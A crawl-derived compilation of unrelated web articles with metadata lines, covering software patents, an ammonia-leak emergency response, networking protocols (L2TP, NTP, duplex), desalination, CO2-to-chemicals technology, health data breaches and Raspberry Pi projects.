Patents are out of bounds when it comes to standard protocols.Theres a reason for the U.S. Patent and Trademark Office. It was created to foster invention by rewarding inventors for their time and trouble by granting temporary monopoly protection for the fruits of their labor. The net result is a benefit to society: Rewarding inventors tends to bring about more invention and economic productivity. Because patent applications mandate disclosure, the patent process has social advantages over trade-secret alternatives. However, if a given law or enforcement pattern of a lawincluding patent lawresults in harm to society, then its time to change the laws. Patents on software carry the potential of harm to the software industry and thereby to the economy. Equally problematic are the so-called method patents, or patents on application behavior, such as Amazons famousor infamousone-click patent.
How dangerous are software patents? Information Builders President and CEO Gerald Cohen warned eWEEK editors that the presence of patents is a scourge to the industry. Cohen has seen much innovation in a patent-free climate. Now he and other software leaders are being threatened with lawsuits. Software companies need to create software, which, after all, often has a short shelf life. They do not need to spend precious resources hiring expensive attorneys. Copyright protection should be enough. A copyright protects original expression; its existence encourages software developers to seek new ways of presenting function to users and of streamlining integration behind the scenes. | <urn:uuid:6ae10b3d-38c1-4ee4-94a3-24cfda45eef9> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Application-Development/Patent-Progress | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00462-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934232 | 297 | 2.53125 | 3 |
Imagine working in an environment where more than 50 languages are spoken. How would first responders communicate with the victims during an emergency?
In February 2004, this was an issue for more than 2,000 employees at the John Morrell pork plant in Sioux Falls, S.D., when ammonia diffused throughout the facility, causing a mass evacuation during frigid winter temperatures. More than 100 people were injured. Erroneous calls and a major language barrier hindered the Sioux Falls Fire Department's initial stages of response.
"Initially the call was [that] someone was injured in a piece of machinery, and it was later changed to a minor fire," said Jim Sideras, the department's fire chief. "When crews got there it was just one fire truck and then they realized that it was a significant event. The first call always seems to be wrong."
Ammonia - a colorless, pungent gas - is commonly used as a refrigerant and for food preservation at meatpacking facilities. Exposure to the gas usually causes irritation to the respiratory system, eyes and skin. Though the gas is mostly harmless in small doses, inhalation in high concentrations can cause lung damage and even death.
Because ammonia is considered a toxic chemical, the U.S.
Occupational Safety and Health Administration requires that it be handled as a hazardous waste, which meant response needed to be swift, organized and well executed, despite all the obstacles.
With so many variables involved - lack of equipment, communication barriers and weather - emergency responders faced many hurdles to gain control of the situation.
The response was divided into three operations: a rescue operation to evacuate people who were in the plant; a hazardous materials operation to handle the leak; and an emergency medical services (EMS) branch to provide medical treatment.
EMS used START triage - simple triage and rapid transport/treatment - for casualty care. START triage classifies the severity of casualties by the colors red, yellow, green or black using an RPM (respiratory, perfusion and mental status) system.
"When you think about RPMs, you think about cars and what a red line is. When the respirations are over 30 [per minute] they're going to be classified as red. If they have a capillary refill, which means you push down on your thumbnail and it's longer than two seconds [for color to return], that is going to be a red," Sideras said. "What that means is they are not perfusing very well and might have internal bleeding or hemorrhaging. So that's what "P" is: perfusion. The M is mental status. If they can't answer simple questions and squeeze my fingers, they could have a head injury. So those would be classified as red."
START is a simple method, but triage tags are a necessity that was lacking during the pork plant response. "We didn't have a consistent triage tag for our system. It sounds like a minor thing, but it really wasn't," Sideras said. "Having a consistent triage tag ensures that every responder is going off the same triage tags."
Emergency responders worked around this obstacle by using ribbons, but South Dakota has since implemented statewide triage tags, which means care is consistent and responders are on the same page.
The wintry weather and communication barriers - multiple spoken languages and inconsistent radio reception - were other obstacles for first responders. "One of the difficulties was that the incident happened in February and in South Dakota it's about 10 degrees out," Sideras said, adding that responders weren't prepared to handle
a mass casualty event indoors. "We also had difficulty with communication, because where we set up the treatment areas indoors, for some reason we could not get the radios or cell phones to work very well, so sometimes we actually had to go outside to use the radios."
Although the fire department couldn't do much to solve the patchy radio and cell phone reception, they overcame on-site communication barriers using interpreters to ascertain information from casualties to help with triaging. "The plant has interpreters. They are identified by a certain color of hardhat. We did have some people who were actually interpreters, and we also had some people who were bilingual and could help," Sideras said.
As for radio communication, the department's crew had to trek inside and out to correspond with each other and the hospital. Even though communication was hampered, having direct contact with the hospital's emergency department helped immensely.
"It worked out," Sideras said, "but if we didn't have cell numbers for the direct lines into the hospital ER, it would have been much more difficult because we would have been trying to get through switchboards."
Emergency crews controlled the incident by improvising on scene and using their resources - fire department tags and translators - wisely. The hazardous materials team stemmed the ammonia leak by allowing it to dissipate in the air.
With the situation under control, both teams rest assured that business could resume normally. Sideras said he's confident that if the incident were to happen again, the response would go much more smoothly with all of their lessons learned.
"Break everything down into three to five things, work on them and figure out how to meet those things to reach your strategic objective," he said. "We teach our incident commanders, we critically review every incident we go on ... every major incident. The first question is, 'What were your strategic goals?' A lot of people are doing the task before they know what the strategy is for the incident." | <urn:uuid:7cc07313-966e-42f5-9e94-c30166d01f47> | CC-MAIN-2017-04 | http://www.govtech.com/dc/articles/102472609.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00372-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.979793 | 1,146 | 3.328125 | 3 |
This three-day instructor-led course teaches students how to use the powerful features and capabilities of IBM WebSphere Business Modeler V7, as well as key business process management (BPM) practices, to map, document, and analyze business processes.
WebSphere Business Modeler V7 enables the visualization, documentation, modeling, and analysis of business processes for understanding and process execution. Business Modeler provides a comprehensive view of the processes that underlie how organizations do business, which allows users to document business processes and to improve them through business process analysis.
In this course, students receive intensive training in documenting business processes and conducting analysis with WebSphere Business Modeler V7. The course begins with an overview of Business Modeler and the concept of business processes. Students learn how to document business processes by creating business process diagrams with Business Process Modeling Notation (BPMN). Students also learn how to define human tasks and business rules tasks, validate the process model, and apply common modeling patterns.
Hands-on lab exercises include creating process models using the Swimlane editor, project versioning using Rational ClearCase, and performing team collaboration by using WebSphere Business Compass with Business Space powered by WebSphere. Students then apply what they learned, using these concepts and techniques to develop their own models based on a provided business scenario. | <urn:uuid:0c296c40-3632-4ef0-a691-c2bb612b55d9> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/119589/ibm-websphere-business-modeler-v7-process-mapping-and-analysis-1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00362-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91275 | 269 | 2.734375 | 3 |
You know how people who spend too much time in the sun look older than they are? It's the same for Earth's only natural satellite: A few billion years of exposure with no atmosphere to block the sun's radiation, and suddenly passing asteroids are calling you "the old dude." I kid, of course. Asteroids aren't nearly that rude. But it does appear that scientists were slightly off in their initial estimates of the moon's age. From Phys.org:
Improved age data for the Moon suggests that it is much younger than previously believed according to scientists presenting at a Royal Society discussion meeting entitled Origins of the Moon this week. Professor Richard Carlson of the Carnegie Institution of Washington will say that Earth's Moon is more likely between 4.4 and 4.45 billion years old rather than 4.56 billion years old, as previously thought.
So the moon may be about 100 million years younger than we first believed. Granted, that's like finding out your mother is two weeks younger than you thought. But still! Besides requiring the moon to change its date of birth on its Facebook page, does this matter? Yes, according to Professor Richard Carlson of the Carnegie Institution of Washington, who explains to Phys.org: "There are several important implications of this late Moon formation that have not yet been worked out," Carlson says. "For example, if the Earth was already differentiated prior to the giant impact, would the impact have blown off the primordial atmosphere that formed from this earlier epoch of Earth history?" Beats me, professor. Let me check Wikipedia and I'll get back to you. Now read this: | <urn:uuid:7aa29688-255c-4d3b-bcb4-20abf62bf47b> | CC-MAIN-2017-04 | http://www.itworld.com/article/2704581/enterprise-software/moon-is-100-million-years-younger-than-we-thought--and-that-s-what-too-much-sun-can-do-you-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00022-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965193 | 326 | 3.453125 | 3 |
From R2D2 to a spacefaring bear, people around the world are pushing the limits of the mini-computer.
The Raspberry Pi foundation has recently announced that a million of the small, cheap computers aimed at transforming computer education have now been manufactured in the UK. But the Pi isn’t only a British success story, but an international one.
With millions sold worldwide, the most successful British computer since the ’80s is transofrming how people learn, create and code with their electronics. Thousands upon thousands of DIY projects have been posted online since the Pi’s inception in February 2012, and here, CBR gives you five of the coolest, most awesome Pi projects we’ve seen around the web.
Ph. D student Lingxiang Xiang customised this Hasbro R2D2 Star Wars toy for his girlfriend with a Raspberry Pi.
It moves, has voice recognition, motion detection, distance detection, Wi-Fi, a camera and face recognition software.
The little robot can obey commands like ‘come here’, ‘turn left’ and ‘record’, just like the real thing!
The Pi inside is running the Debian-based Raspbian OS.
A lot of technical know-how has gone into putting R2D2 together, but the whole system runs on the core of a Raspberry Pi with the Debian-based installed. Linxiang is planning on posting instructions on how to make your own clever R2 unit online soon.
Facial recognition was implemented usingOpenCV. Voice commands in either English or Chinese were made possible byPocketSphinx.
It must have done wonders for Xiang’s relationship, as his girlfriend is now his fiance. | <urn:uuid:628476fc-4985-4793-a1a5-282ac5f748fc> | CC-MAIN-2017-04 | http://www.cbronline.com/news/enterprise-it/top-5-coolest-raspberry-pi-projects-4146573 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00326-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948152 | 361 | 2.734375 | 3 |
L2TP Attributes Summary
Projected L2TP standard was made available in the year 1999 by means of RFC 2661. It was originated primarily from two different tunneling protocols, named as: Point-to-Point communication protocol and PPTP (Point to Point Tunneling protocol). In other words, L2TP (Layer 2 Tunnel Protocol) is an up-and-coming IETF (Internet Engineering Task Force) standard that came in front with the traits of two on-hand tunneling protocols, named as: Cisco’s L2F (Layer 2 Forwarding) and Microsoft’s PPTP (Point-to-Point Tunneling Protocol). L2TP protocol is actually an expanded form of the PPP (a significant constituent for VPNs).
VPNs (virtual private networks) may let the user to connect to the corporate intranets/extranets. VPNs provides cost-effective networking but long-established dial-up networks hold up only registered IP (internet protocol) addresses, which are used to limit the applications types for VPNs. The main reasons for L2TP utilization is its support to multiple protocols along with holding of unregistered and privately directed IP addresses.
L2TP may be used as a part of ISP (internet service provider) delivery of services. But in such cases, it may remain powerless in providing any kind of encryption service for having privacy feature, etc. That’s why it is usually dependant upon an encryption offering protocol.
But L2TPv3 is branded as the latest version of under discussion protocol, which was introduced in RFC 3931(2005). And this most up-to-date version offered added security features, enhanced encapsulation, along with the capacity to take data links, etc.
Packet’s structure for L2TP
An L2TP packet is made up of different fields as: flags and version information (0-15 bits) field, length (16-31bits) field but it is an optional field, Tunnel ID (0-15 bits) field, session ID (16-31 bits) field, Ns (0-15 bits) optional field, Nr (16-31 bits) optional field, offset size (0-15 bits) optional field, offset pad (16-31 bits) optional field and payload data field of variable length.
Packet’s exchange in case of L2TP
At L2TP connection set up time, lots of control packets may be swapped between server side and client side in order to create tunnel and session so to be used for every direction. With control packets help, one peer may request to other peer for the assignment of a particular tunnel plus session id so data packets by using them (tunnel and session id) can make exchanges with the PPP frames.
Further that L2TP control messages list is exchanged in connecting LAC and LNS, for the purpose of handshaking previous to the establishment of a tunnel plus session.
L2TP tunnel models
An L2TP tunnel may make bigger across the complete PPP session or else across simply one part of a session with two segments. Different tunneling models can be used to represent this state of affairs and these models are named as: voluntary tunnel model, compulsory tunnel model (for incoming call), compulsory tunnel model (for remote dial up connection plus L2TP multi-hop connections).
- Supporting Multi-hop
- Operate like a client initiated Virtual Private Network (VPN) solution
- Cisco’s L2F offered value-added traits, as load sharing plus backup support | <urn:uuid:d5650f1c-72ec-4dcd-b22e-423a5fe47c82> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2013/l2tp | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00050-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.874883 | 743 | 3.25 | 3 |
Early efforts at desalination, large-scale water filtration for drinking and other purposes began during the 1960s with Bahrain and Kuwait setting up the first plants, using the MED (multi-distiller effect) technology. During the mid-twentieth century, Kuwait became the first member of GCC (Gulf Cooperation Council) to use MSF (Multi-Stage Flash) distillation technology. The GCC represents a group of wealthy nation states with an increasing demand for freshwater. Desalination plants power both municipalities as well as businesses in the GCC. The contracted capacity of existing desalination plants is anticipated to increase over time. This is despite the fact that over 43% of all contracted plants around the world currently exist in GCC. As of 2013, almost 70% of the total global contracted and online capacity came from the GCC.As of 2015, the desalination market in GCC was worth USD X.X billion. The market size is expected to grow at a CAGR of XX.XX%.
The depleting natural precipitation and ground-water levels and increasing population are the major drivers of the sector in the region. A continued effort at increasing diversification of government income from hydrocarbons is another factor that has led to an increase in construction projects, industries, manufacturing plants, etc., leading to more demand for fresh water. Moreover, the government is supporting and encouraging the establishment of desalination plants to meet the nation’s demands.
Restraints and Challenges
The biggest challenge of desalination is the cost. As per a study, the cost of desalinated water per meter cube was USD 1.04, 0.95 and 0.82 for MSF, MED, and RO, assuming a fuel cost of USD 1.5/ GJ. Moreover, energy accounts for approximately three-fourths of the supply cost of desalination. Transportation cost is also added to the overall cost, making desalination a very costly process. Another negative impact of desalination is on the environment with the treatment of brackish water leading to pollution of fresh water resources and soil. Discharge of salt on coastal or marine ecosystems also has a negative impact.
The growing global outcry over climate change, majorly caused by the hype and awareness about the environmental effects of greenhouse gas emissions at the Global Climate Change Summit in Paris in 2015, has opened up large investment avenues in the desalination market in GCC. Many GCC countries intend to make desalination the source of 100% public potable water supply. Moreover, the nations are inviting more and more foreign investments in the region to keep up with the domestic needs that are continuously on the rise due to increase in the number of construction projects, manufacturing industries, etc.
About the Market
PESTLE Analysis (Overview): Macro market factors pertinent to this region
Market Definition: Main as well as associated/ancillary components constituting the market
Key Findings of the Study: Top headlines about market trends & numbers | <urn:uuid:82b9377d-b020-4108-b747-4630d24b63cd> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/analysis-of-the-desalination-industry-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00472-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943151 | 610 | 3.34375 | 3 |
Breaches of Health Care Data: A Growing Epidemic
Few types of data are as sensitive and valuable as protected health information (PHI). Unfortunately, theft of this information is becoming a regular event. According to the "Verizon 2015 Protected Health Information Data Breach Report," 90 percent of industries in the medical and health care arena have experienced a PHI breach. Verizon examined datasets across 25 countries, and it's clear that the problem has reached a critical point. Several major breaches occurred in the U.S. recently, including incidents at the U.S. Department of Health and Human Services (HHS) and the U.S. Department of Veterans Affairs (VA). What's surprising—and disturbing—is that most organizations that are outside of the health care industry don't realize that they also store this type of data. Common sources of protected health information include employee records (such as health insurance claims and Workers' Compensation claims) and information stored in companies' wellness programs. Verizon reports that this information is generally not protected very well. The report states that "Health care providers [need to] better proactively defend patient data from prying eyes; assess processes, procedures and technologies that affect the security of these records; and prescribe a proactive treatment that will help the 'cyber-immune system.'" Here's a look at some key findings. | <urn:uuid:3e90d6a3-0f17-4cfa-b96f-a40b7d491ad8> | CC-MAIN-2017-04 | http://www.baselinemag.com/security/slideshows/breaches-of-health-care-data-a-growing-epidemic.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00196-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952364 | 272 | 2.53125 | 3 |
Security researchers Larry Pesce and Mick Douglas demonstrated on Friday – at this year’s ShmooCon security conference in Washington, D.C – the amazing variety of sensitive information that people send out out over peer-to-peer networks, without a thought as to what would happen if such information fell into the wrong hands.
Using search terms such as word, doctor, health, passwd, password, lease, license, passport and visa; file names like password.txt, TaxReturn.pdf, passport.jpg, visa.jpg, license.jpg and signons2.txt; and a myriad of file extensions, they managed to get their hands on tax forms containing complete personal information of the taxpayer, IRS forms with identification numbers on it, driver’s licenses and passports, event schedules (names, hotel room numbers, performance dates and locations), financial retirement plans, and even information about a student that offered to help U.S. forces in Iraq and is currently hiding for fear of torture and death!
The conclusion? Security awareness is still nonexistent among the typical low-level users, and the process of education must be continued for as long as it takes to make everybody aware of the dangers of sharing sensitive and/or personal information through insecure channels.
Network World reports that the two researchers also presented the Cactus Project, whose purpose is to help organizations carry out this kind of research and impose changes to improve security when it comes to file sharing on the Gnutella bases P2P network. | <urn:uuid:f4b34962-4890-4283-ae64-b2ecc87b8f42> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/02/08/sensitive-information-retrieved-from-p2p-networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00316-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933893 | 308 | 2.546875 | 3 |
The Difference Between Half and Full Duplex Explained
by Paul Wotel
means you're able to send and receive data (most often the human voice) from
the same device whether that be with your phone, 2-way radio, or PC.
Half-duplex devices let
you send and receive, but only one-way at a time. If you've ever used a walkie-talkie,
then you know what half-duplex conversations sound like. You have to push the
TALK button to send your message. But as long as you are holding the TALK key,
you can't hear what anyone else is saying. You must release the button to receive.
That's the big problem with
the old-fashioned speakerphone: it's only a step up from a walkie-talkie. In
essence, it pushes a virtual TALK button every time you start to speak and cuts
off the person on the other end. When you've finished speaking, the speakerphone
then transmits what the person on the other end is saying. Those cut-off sentences
and stop-start conversations can be frustrating to say the least. Two-way radio
etiquette has you saying "over" when you're finished speaking so whoever's
on the other end knows they can begin speaking. Can you imagine having to do
the same on all your business calls?
Enter full duplex
Actually, full duplex is nothing new. In fact, you already know exactly what
it sounds like. Your corded or cordless phones are full-duplex devices letting
you and your caller speak simultaneously without any dropouts in either one
of your voices.
It's when you use a hands-free speakerphone that you really appreciate full duplex. Conventional speakerphones
must shut the speaker off when the mic is activated so as not to pick up your
caller's voice and transmit it along with yours causing an echo effect. When
you speak, you can't hear what your caller is saying. This problem is really
compounded if both of you are using conventional speakerphones. A full-duplex
device digitizes the signal coming out of its speaker (your caller's voice).
It then edits this info out of the signal it's transmitting (your voice) using
a built-in digital processor similar to those found in PCs. This eliminates
echo effect and more importantly, does away with the on-off mic/speaker dilemma.
Full-duplex devices do all of this virtually instantaneously so your calls sound
natural and free-flowing. It's this technology that differentiates high-end
conferencing systems from ordinary, half-duplex speakerphones.
What's "digital duplex"?
Panasonic is trying to rectify the sometimes awful, always annoying half-duplex
sound quality typical of conventional speakerphones by using what they call
Digital Duplex technology. While it doesn't quite deliver the same sound quality
as full duplex, the special digital circuitry does help reduce the echo and
What about talking on the internet?
If you're using your PC to talk on the internet, it's best to install a full-duplex
sound card in your PC. Because internet talk has a host of obstacles specific
to the medium it must overcome—bandwidth, internet traffic, connection
speed—why add the frustration of stop-start, half-duplex conversations?
The time and cost of a full-duplex sound card are worth it.
Still have questions? E-mail
us at email@example.com
and our knowledgeable Customer Service Representatives will be happy to help | <urn:uuid:c2add70b-c4c6-4a3f-a3ea-af33044c9114> | CC-MAIN-2017-04 | http://telecom.hellodirect.com/docs/Tutorials/DuplexExplained.1.080801.asp | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00345-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933916 | 771 | 2.71875 | 3 |
A process is an instance of a computer program that is being executed. It starts when a program is initiated by a command or another program, and it contains the program code and other data associated with the process. There are processes that are necessary for the operating system to run, and every program (such as a MySQL or Apache server) also depends on one or several running processes. Some processes can start child processes. By default, child processes exist until they are terminated or until the parent process terminates.
You can filter the list of processes by name and by the command that was used to start the process. This way you can see, for example, the number of processes started by the Apache server.
CPU usage of a process refers to the percentage of time that the process used the CPU to process data over a sample period of time. Most processes are idle much of the time. However, when two or more processes require the CPU a lot, this can lead to CPU contention and performance issues for all processes. In this case, you should adjust the priority of processes to ensure that critical processes get more access to the CPU than others. For example, on a web server, processes that deal with client requests should be prioritized over certain regular maintenance processes. You do not want tasks such as daily log archiving to affect the speed at which current client requests are served.
Memory usage of a process refers to the amount of physical memory (or main memory) that is used by the process. A process uses physical memory to store its intermediate computational data, the call stack, program code, and so on. Most modern programs create objects in the main memory and operate on them. If your server software does not properly discard unused objects, the amount of memory used by the server processes constantly increases until there is no free memory left for new objects, and the server crashes. This is known as a memory leak, which is a common problem for server software. Monitoring memory usage by your server processes can help you to identify a memory leak early and to react to the problem before your server crashes.
Using the Anturis Console, you can set up monitoring of the number of processes that fit a specific name or command-line mask, the CPU usage by these processes, and their memory usage. This can be done for any hardware component (a server computer) in your infrastructure by adding the Local Processes monitor to the component.
©2017 Anturis Inc. All Rights Reserved. | <urn:uuid:3fbfc06f-ab1c-4caa-8df2-f5b6d609e5e9> | CC-MAIN-2017-04 | https://anturis.com/monitors/local-processes-monitor/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00555-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949602 | 501 | 3.40625 | 3 |
Social Media’s Role in Crisis Communications
New and accessible communication platforms and technologies, such as blogs, social networking sites, Really Simply Syndication (RSS) feeds, and other formats, have the potential to reach more people with more relevant messages than ever before.
But the implications for managing messages to protect public health and safety—especially during times of crisis—can be staggering. Because anyone can create content and distribute it freely, it has become increasingly difficult for those involved in risk communications to control messaging. Government, nonprofit, and commercial organizations must improve their understanding of how to use social media to support their crisis communications strategies.
To better harness the power of social media tools, an expert round table met in Washington, D.C. in March 2009 to address the strategic challenges and opportunities of “Social Media and Risk Communications during Times of Crisis.”
Booz Allen Hamilton, the American Public Health Association, the George Washington University School of Public Health and Health Services, International Association of Emergency Managers, and National Association of Government Communicators co-sponsored the event.
The round table brought together a select group of thought leaders and practitioners from public health, emergency response, crisis communications, and social media arenas to discuss social media strategies before, after, and during crises. Identifying how social media is currently used during emergencies will help public health and emergency managers craft a unified strategy on applying social media to improve emergency communications.
Representatives from the American Red Cross, Centers for Disease Control and Prevention, Federal Bureau of Investigation, Federal Emergency Management Agency, and U.S. Department of Health and Human Services participated in discussions that included innovative best practices, common pitfalls, lessons learned, and informative back stories, and recommended next steps for using social media.
The discussions were summarized in a post-conference report and a series of video podcasts of speaker presentations. The presentations vividly illustrate how widgets, YouTube, Flickr, Twitter, and other social media tools are being used to improve emergency communications, and explain the critical role these tools played in events such as the 2008 attacks on Mumbai and 2009 salmonella-related peanut recall. The report also included:
- Outcomes from break-out sessions on core social media challenges related to public – private partnerships, evaluation, metrics, resource requirements, and social media communication strategies
- Survey results on organizational uses of social media in times of crisis
- Tips on how to implement social media for emergency communications
- A guide to establishing social media best practices
- A social media primer describing the portfolio of social media tools
Principal Grant McLaughlin, senior associate Tim Tinker, and senior consultant Michael Dumlao led Booz Allen’s team of round table organizers, speakers, and break-out session facilitators.
study posted July 23, 2009
- How Web 2.0 Is Changing Responses to Emergencies — Booz Allen's Tim Tinker and Grant McLaughlin talk to Federal News Radio about social media's role in crisis communication and how government agencies can use social media tools. The interview aired on August 25, 2009.
- Risk and Crisis Communications: Best practices for Government agencies and Non-profit organizations. | <urn:uuid:92a59b73-c97c-4153-a46a-cfcfebb78909> | CC-MAIN-2017-04 | http://www.boozallen.com/insights/2009/07/42420696 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00491-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903736 | 642 | 2.984375 | 3 |
MONMOUTH JUNCTION, NJ--(Marketwired - Mar 5, 2014) - Liquid Light unveiled its new process for the production of major chemicals from carbon dioxide (CO2), showcasing its demonstration-scale 'reaction cell' and confirming the potential for cost-advantaged process economics. Because carbon dioxide -- a greenhouse gas -- is low-cost and readily available worldwide, Liquid Light's customers can profit by producing high-value chemicals from CO2 'waste'; reduce their dependence on oil; and potentially reduce their carbon footprint.
Liquid Light's first process is for the production of ethylene glycol (MEG), with a $27 billion annual market, which is used to make a wide range of consumer products such as plastic bottles, antifreeze and polyester clothing. Liquid Light's technology can be used to produce more than 60 chemicals with large existing markets, including propylene, isopropanol, methyl-methacrylate and acetic acid.
Making electrocatalytics practical for harnessing carbon dioxide as an alternative feedstock
Liquid Light's core technology is centered on low-energy catalytic electrochemistry to convert CO2 to chemicals, combined with hydrogenation and purification operations. By adjusting the design of their catalyst, Liquid Light can produce a range of commercially important multi-carbon chemicals. Additionally, by using 'co-feedstocks' along with CO2, a plant built with Liquid Light's technology may produce multiple products simultaneously.
Liquid Light's advances that enable commercialization include the development of long-lasting catalyst components; the ability to run continuously for extended times; and major progress in energy efficiency.
Promising economics from low-cost feedstock and proven-efficient process
Results to date highlight promising economics in three key dimensions:
1. Process performance validated at lab scale: In test runs, Liquid Light has met the targets needed for cost-advantaged production in metrics including energy needed per unit of output; rate of production; yield; and stability/longevity of cell components.
2. Large savings in feedstock costs: Liquid Light's process requires $125 or less of CO2 to make a ton of MEG. Other processes require an estimated $617 to $1,113 of feedstocks derived from oil, natural gas or corn. These differences are especially significant as MEG sells for $700 to $1,400 per metric ton.
3. High project value for technology licensees: Current estimates show that a 400kT per year Liquid Light MEG plant would offer more than $250 million in added project value as compared to a plant built using the best currently available process technology. A 625kTa plant would have a 15 year net present value of over $850 million to a licensee.
Liquid Light's process: Reduction in carbon footprint for chemical production
Liquid Light's process also reduces the overall carbon footprint for chemical production compared to conventional methods, when powered with electricity produced from natural gas, nuclear, advanced coal and renewable sources. Further, Liquid Light's process can sequester carbon -- meaning it is a net reducer of carbon in the environment -- when using energy sources like solar, hydro, wind or nuclear power. To further demonstrate this potential benefit, the company also showed the process can be powered by intermittently-available renewable energy sources like solar and wind. The result is that chemicals can be made directly from renewable energy sources and CO2.
"We're delighted to be introducing a new and valuable alternative for the mainstream chemical industry," said Kyle Teamey, CEO of Liquid Light. "Liquid Light's technology offers a new and cost-effective way to make everyday products from plain old carbon dioxide. This is a great way to reduce our dependence on fossil fuels while we simultaneously consume an environmental pollutant."
About Liquid Light
Liquid Light develops and licenses process technology to make major chemicals from low-cost, globally-abundant carbon dioxide (CO2). Customers profit from a lower cost of production, while harnessing their current waste stream; reduce their dependence on cyclically-priced petroleum feedstocks; and can reduce their carbon footprint.
Liquid Light's first process is for the production of ethylene glycol (MEG), with a $27 billion annual market. Results consistent with cost-advantaged production have been validated at lab scale for key parts of our process; and the process scales in a predictable manner, akin to world-scale chlor-alkali plants.
Liquid Light's core technology is centered on low-energy catalytic electrochemistry to convert CO2 to multi-carbon chemicals. It is backed by more than 100 patents and applications, and extends to multiple chemicals with large existing markets, including ethylene glycol, propylene, isopropanol, methyl-methacrylate and acetic acid.
Liquid Light's investors include VantagePoint Capital Partners, BP Ventures, Chrysalix Energy Venture Capital, and Osage University Partners. | <urn:uuid:8d8f3188-af16-4bb7-9b44-d9f4861b4a2a> | CC-MAIN-2017-04 | http://www.marketwired.com/press-release/liquid-light-unveils-cost-advantaged-catalytic-process-to-make-chemicals-from-co2-1885590.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00519-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919846 | 1,010 | 2.734375 | 3 |
NTP: It's About Time
Perhaps one of the most overlooked elements of network management is that of time synchronization. If its importance in the overall health of the network were better understood, then perhaps it would be paid more attention. In this article, I'll discuss time synchronization and the Network Time Protocol.
Why Synchronization Matters
In a local area network (LAN), time synchronization is important because it affects components such as file systems and applications. If the time being issued to the server by the system hardware clock is incorrect, it is quite possible for corruption to occur within applications, particularly in complex systems such as databases. In wide area networks (WANs), time synchronization is even more essential. The distributed nature of WANs greatly increases the probability of an incorrect timestamp, not to mention the fact that WANs often span time zones, further complicating the issue.
One of the best (and most used) examples of the importance of time synchronization is that of e-mail. Imagine receiving an e-mail, the timestamp of which indicates that it was received before it was sent. Very confusing. Another more frightening example includes the computers used by air traffic controllers, but we won't even go there. So, how does an operating system get the wrong time?
For the most part, operating systems take their time from the local hardware clock of the system on which they are loaded. Although hardware clocks have improved in terms of accuracy and reliability, they are still prone to inaccuracies. In addition, the one-to-one relationship of the operating system and the machine on which it is running means that it is very possible for two different systems on a network to have different times. What is needed is a mechanism that allows systems to synchronize themselves with a reliable time source and subsequently with each other. The mechanism is the Network Time Protocol (NTP).
Guidelines pertaining to the use of Network Time Protocol time sources are available on the Internet. A document describing these Rules of Engagement, along with a list of public time servers, can be found here.
NTP operates over UDP on port 123. If you're using a firewall, you may need to change the firewall configuration so that NTP traffic can flow through.
Network Time Protocol
NTP is not a new protocol; in fact, it's been around since the 1980s. The current version of NTP, version 4, is relatively new, and previous versions are still well supported. Great care is taken to ensure that new versions of NTP are backward compatible. The generic nature of NTP means that it is platform independent, and NTP support is available for almost all popular platforms including Linux, Unix, Windows NT/2000, Novell NetWare, Windows 95/98, Mac, as well as other networking devices such as routers. There is even a version for Palm! In many cases, shareware and freeware versions of NTP server and client software are available. Some of these use the lighter Simple NTP (SNTP) protocol, which is based on standard NTP but has less overhead.
Before time can be synchronized by NTP, the correct time must first be ascertained. One of the most popular methods of obtaining this information is from Internet-based public time servers. The servers are structured in a tiered model, with those at the top tier designed to be the most accurate. These top-level Internet time servers are known as Primary, or Stratum-1, time servers. Stratum-1 servers provide accurate time by synchronizing with reliable sources such as the Global Positioning System or purpose-specific radio broadcasts. To ensure that these Primary time servers are not overwhelmed with requests, a number of other servers are also configured as Secondary, or Stratum-2, time servers. Although there may be small differences in time between the Stratum 1 and 2 servers, the possible change is limited and makes no difference to most networks.
The specifics of setting up time synchronization and using NTP on a system will depend on the platform(s) you are using. In most instances, setup is simply a case of installing (and if necessary compiling) the NTP software, loading it, and pointing it at a reliable time source. Depending on how many other devices you want to synchronize, you can then configure NTP on other devices to also point to the reliable time source, or to the original server that is receiving time. In turn, other servers can be configured to receive time from these other servers, creating a stratum model of your own.
